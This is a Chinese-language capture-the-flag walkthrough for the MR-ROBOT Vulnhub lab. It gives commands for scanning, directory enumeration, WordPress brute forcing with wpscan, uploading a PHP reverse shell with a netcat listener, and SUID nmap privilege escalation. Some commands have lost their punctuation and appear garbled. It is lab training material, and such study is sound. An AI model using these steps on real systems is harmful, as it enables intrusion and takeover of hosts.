1. 环境准备与靶机搭建MR-ROBOT靶机是Vulnhub平台上非常经典的渗透测试练习环境模拟了一个存在多重安全漏洞的WordPress网站。我建议使用VirtualBox来运行这个靶机因为它对硬件资源要求较低特别适合新手。下载完成后直接导入OVA文件默认会以NAT模式联网这样你的攻击机比如Kali Linux和靶机就能处于同一网络环境。这里有个小技巧首次启动靶机时可能会卡在登录界面其实这是正常现象。靶机本身不需要你登录只要保持运行状态即可。我遇到过不少新手在这里浪费大量时间尝试破解登录密码完全没必要。接下来我们要做的就是通过渗透测试的手段从外部攻破这个系统。2. 信息收集与端口扫描渗透测试的第一步永远是信息收集。我习惯先用arp-scan快速定位靶机IP这个命令比netdiscover更轻量arp-scan -l --interfaceeth0找到靶机IP后比如192.168.56.103就该上nmap进行详细扫描了。这里有个实用技巧先用快速扫描确认开放端口再针对性地深度扫描nmap -sS -T4 -p- 192.168.56.103 nmap -sV -sC -O -p80,443 192.168.56.103从扫描结果你会发现80端口运行着Web服务这就是我们的突破口。我建议同时开着nikto扫描Web漏洞它能发现很多常见安全问题nikto -h http://192.168.56.1033. Web目录枚举与敏感信息挖掘用dirb或gobuster扫描网站目录是必经之路。我更喜欢用gobuster速度更快gobuster dir -u http://192.168.56.103 -w /usr/share/wordlists/dirb/common.txt一定要检查robots.txt文件在MR-ROBOT靶机中这个文件藏着第一个flag和关键字典文件。下载fsocity.dic后你会发现它有很多重复内容记得先处理一下sort fsocity.dic | uniq clean.dic这个字典会在后续爆破阶段派上大用场。我遇到过有人直接用原始字典爆破结果多花了好几倍时间这都是血泪教训啊。4. WordPress漏洞利用通过扫描结果可以发现这是个WordPress站点。我们先确认后台地址wpscan --url http://192.168.56.103 --enumerate u这里有个省时技巧通过密码找回功能抓包能直接获取用户名。用Burp Suite拦截请求你会发现用户名为Elliot。有了用户名和清洗过的字典爆破密码就简单多了wpscan --url http://192.168.56.103 -U elliot -P clean.dic爆破成功后密码是ER28-0652登录后台上传webshell。我推荐用/usr/share/webshells/php/php-reverse-shell.php记得修改里面的IP和端口$ip 192.168.56.102; // 你的Kali IP $port 4444;上传后别忘了在Kali上启动监听nc -lvnp 44445. 权限提升与最终突破拿到初始shell后先用Python优化交互环境python -c import pty; pty.spawn(/bin/bash)查找SUID提权机会时发现nmap有SUID权限这可是黄金机会find / -perm -4000 2/dev/null nmap --interactive !sh最后在/root目录找到第三个flag。这里有个小坑直接cat可能看不到内容试试cd /root cat key*整个渗透过程看似简单但每个环节都可能遇到各种问题。比如我在第一次做这个靶机时就因为没处理字典重复内容白白浪费了两个小时。记住渗透测试就是不断试错和积累经验的过程。